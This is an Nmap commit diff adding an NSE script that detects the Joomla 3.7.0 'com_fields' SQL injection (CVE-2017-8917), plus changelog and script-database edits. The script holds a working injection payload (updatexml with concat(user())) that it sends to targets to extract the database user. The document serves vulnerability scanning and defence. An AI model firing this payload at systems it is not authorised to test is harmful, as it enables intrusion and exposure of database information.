Added http-vuln-cve2017-8917.nse. Closes #916

2025-12-06 12:41:29 +00:00 · 2017-06-26 20:10:32 +00:00
parent 226863eef2
commit 50964389a4
3 changed files with 149 additions and 2 deletions
--- a/5
+++ b/5
@@ -1,4 +1,7 @@
-# Nmap Changelog ($Id: CHANGELOG 36805 2017-06-11 20:17:30Z dmiller $); -*-text-*-
+# Nmap Changelog ($Id$); -*-text-*-
 o [NSE] http-vuln-cve2017-8917 checks for an SQL injection vulnerability
  affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]
 o [NSE][GH#141] http-useragent-checker now checks for changes in HTTP status
  (usually 403 Forbidden) in addition to redirects to indicate forbidden User
--- a/scripts/http-vuln-cve2017-8917.nse
+++ b/scripts/http-vuln-cve2017-8917.nse
@@ -0,0 +1,143 @@
 local http = require "http"
 local shortport = require "shortport"
 local string = require "string"
 local stdnse = require "stdnse"
 local vulns = require "vulns"
 local table = require "table"
 description = [[
 An SQL Injection vulnerability affecting Joomla! 3.7.x before 3.7.1 allows for
 unauthenticated users to execute arbitrary SQL commands. This vulnerability was
 caused by a new component, <code>com_fields</code>, which was introduced in
 version 3.7. This component is publicly accessible, which means this can be
 exploited by any malicious individual visiting the site.
 The script attempts to inject an SQL statement that runs the <code>user()</code>
 information function on the target website. A successful injection will return
 the current MySQL user name and host name in the extra_info table.
 This script is based on a Python script written by brianwrf.
 References:
 * https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
 * https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917
 ]]
 ---
 -- @usage nmap --script http-vuln-cve2017-8917 -p 80 <target>
 -- @usage nmap --script http-vuln-cve2017-8917 --script-args http-vuln-cve2017-8917.uri=joomla/ -p 80<target>
 -- @output
 -- PORT   STATE SERVICE VERSION
 -- 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
 -- | http-vuln-cve2017-8917:
 -- |   VULNERABLE:
 -- |   Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
 -- |       State: VULNERABLE
 -- |     IDs:  CVE:CVE-2017-8917
 -- |     Risk factor: High  CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
 -- |       An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
 -- |       to execute aribitrary SQL commands via unspecified vectors.
 -- |
 -- |     Disclosure date: 2017-05-17
 -- |     Extra information:
 -- |       User: root@localhost
 -- |     References:
 -- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
 -- |_      https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
 --
 -- @xmloutput
 -- <table key="CVE-2017-8917">
 -- <elem key="title">Joomla! 3.7.0 &apos;com_fields&apos; SQL Injection Vulnerability</elem>
 -- <elem key="state">VULNERABLE</elem>
 -- <table key="ids">
 -- <elem>CVE:CVE-2017-8917</elem>
 -- </table>
 -- <table key="scores">
 -- <elem key="CVSSv3">9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</elem>
 -- </table>
 -- <table key="description">
 -- <elem>An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers&#xa;to execute aribitrary SQL commands via unspecified vectors.&#xa;</elem>
 -- </table>
 -- <table key="dates">
 -- <table key="disclosure">
 -- <elem key="day">17</elem>
 -- <elem key="month">05</elem>
 -- <elem key="year">2017</elem>
 -- </table>
 -- </table>
 -- <elem key="disclosure">2017-05-17</elem>
 -- <table key="check_results">
 -- </table>
 -- <table key="extra_info">
 -- <elem>User: root@localhost</elem>
 -- </table>
 -- <table key="refs">
 -- <elem>https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html</elem>
 -- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917</elem>
 -- </table>
 -- </table>
 -- @args http-vuln-cve2017-8917.uri The webroot of the Joomla installation
 --
 ---
 author = "Wong Wai Tuck"
 license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
 categories = {"vuln", "intrusive"}
 local REG_EXP_SUCCESS = {"XPATH syntax error: &#039;(.-)&#039;",
  "XPATH syntax error: '(.-)'"}
 portrule = shortport.http
 action = function(host, port)
  local vuln_table = {
    title = "Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability",
    IDS = {CVE = 'CVE-2017-8917'},
    risk_factor = "High",
    scores = {
      CVSSv3 = "9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)",
    },
    description = [[
 An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
 to execute aribitrary SQL commands via unspecified vectors.
 ]],
    references = {
        'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html',
    },
    dates = {
      disclosure = {year = '2017', month = '05', day = '17'},
    },
    check_results = {},
    extra_info = {}
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  vuln_table.state = vulns.STATE.NOT_VULN
  local uri = stdnse.get_script_args(SCRIPT_NAME .. '.uri') or '/'
  uri = uri .. 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)'
  stdnse.debug1("Attacking uri %s", uri)
  local response = http.get(host, port, uri)
  stdnse.debug1("Response %s", response.status)
  if response.status then
    local result, matches
    -- If it contains a matching string, it means SQL injection was successful
    -- Otherwise it isn't vulnerable
    for _,  pattern in ipairs(REG_EXP_SUCCESS) do
      stdnse.debug1(pattern)
      result, matches = http.response_contains(response, pattern)
      if result then
        stdnse.debug1("Vulnerability found!")
        vuln_table.state = vulns.STATE.VULN
        table.insert(vuln_table.extra_info, string.format("User: %s", matches[1]))
        break
      end
    end
  end
  return vuln_report:make_output(vuln_table)
 end
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -142,7 +142,7 @@ Entry { filename = "hadoop-tasktracker-info.nse", categories = { "default", "dis
 Entry { filename = "hbase-master-info.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "hbase-region-info.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "hddtemp-info.nse", categories = { "default", "discovery", "safe", } }
-Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", } }
+Entry { filename = "hnap-info.nse", categories = { "default", "discovery", "safe", "version", } }
 Entry { filename = "hostmap-bfk.nse", categories = { "discovery", "external", } }
 Entry { filename = "hostmap-ip2hosts.nse", categories = { "discovery", "external", } }
 Entry { filename = "hostmap-robtex.nse", categories = { "discovery", "external", "safe", } }
@@ -265,6 +265,7 @@ Entry { filename = "http-vuln-cve2015-1635.nse", categories = { "safe", "vuln",
 Entry { filename = "http-vuln-cve2017-1001000.nse", categories = { "safe", "vuln", } }
 Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
 Entry { filename = "http-vuln-cve2017-5689.nse", categories = { "auth", "exploit", "vuln", } }
 Entry { filename = "http-vuln-cve2017-8917.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-misfortune-cookie.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "http-vuln-wnr1000-creds.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-waf-detect.nse", categories = { "discovery", "intrusive", } }